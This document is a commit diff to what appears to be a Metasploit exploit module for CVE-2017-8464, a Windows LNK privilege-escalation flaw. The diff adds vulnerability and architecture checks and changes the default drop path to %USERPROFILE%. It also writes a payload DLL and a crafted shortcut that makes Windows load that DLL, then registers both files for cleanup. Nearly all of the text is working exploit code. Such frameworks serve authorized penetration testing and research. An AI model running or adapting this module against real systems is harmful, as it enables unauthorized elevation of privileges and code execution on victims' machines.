Cleanup the CVE-2017-8464 LPE module

Author: zeroSteiner

modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb

@@ -7,7 +7,9 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
   include Msf::Post::File
+  include Msf::Post::Windows::Priv
 
   attr_accessor :exploit_dll_name
 
@@ -26,8 +28,8 @@ def initialize(info = {})
           the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
           DLL file.
 
-          If no PATH is specified, the module will use drive letters D through Z so the files
-          may be placed in the root path of a drive such as a shared VM folder or USB drive.
+          The PATH option must be an absolute path to a writeable directory which is indexed for
+          searching. If no PATH is specified, the module defaults to %USERPROFILE%.
         },
         'Author'          =>
           [
@@ -47,8 +49,9 @@ def initialize(info = {})
           ],
         'DefaultOptions'  =>
           {
-            'EXITFUNC'    => 'process',
-            'WfsDelay'    => 30,
+            'EXITFUNC'         => 'process',
+            'FileDropperDelay' => 15,
+            'WfsDelay'         => 30
           },
         'Arch'            => [ARCH_X86, ARCH_X64],
         'Payload'         =>
@@ -58,7 +61,6 @@ def initialize(info = {})
         'Platform'        => 'win',
         'Targets'         =>
           [
-            [ 'Automatic',   { 'Arch' => ARCH_ANY } ],
             [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
             [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
           ],
@@ -84,22 +86,53 @@ def initialize(info = {})
     )
   end
 
+  def check
+    if session.sys.process['SearchIndexer.exe']
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def get_name(option, default_ext)
+    name = datastore[option].to_s.strip
+    name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank?
+    name
+  end
+
   def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
+    if session.platform != 'windows'
+      fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
+    end
+
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
+    end
+
+    if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
+    end
+
     path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
     arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
     datastore['EXE::Path'] = path
     datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
 
-    path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%")
+    path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%")
     path.chomp!("\\")
 
-    dll = generate_payload_dll
-    dll_name = datastore['DLLNAME'] || "#{rand_text_alpha(16)}.dll"
-    dll_path = write_file("#{path}\\#{dll_name}", dll)
+    dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}"
+    write_file(dll_path, generate_payload_dll)
 
-    lnk = generate_link("#{path}\\#{dll_name}")
-    lnk_filename = datastore['FILENAME'] || "#{rand_text_alpha(16)}.lnk"
-    lnk_path = write_file("#{path}\\#{lnk_filename}", lnk)
+    lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}"
+    write_file(lnk_path, generate_link(dll_path))
+    register_files_for_cleanup(dll_path, lnk_path)
   end
 
   def generate_link(path)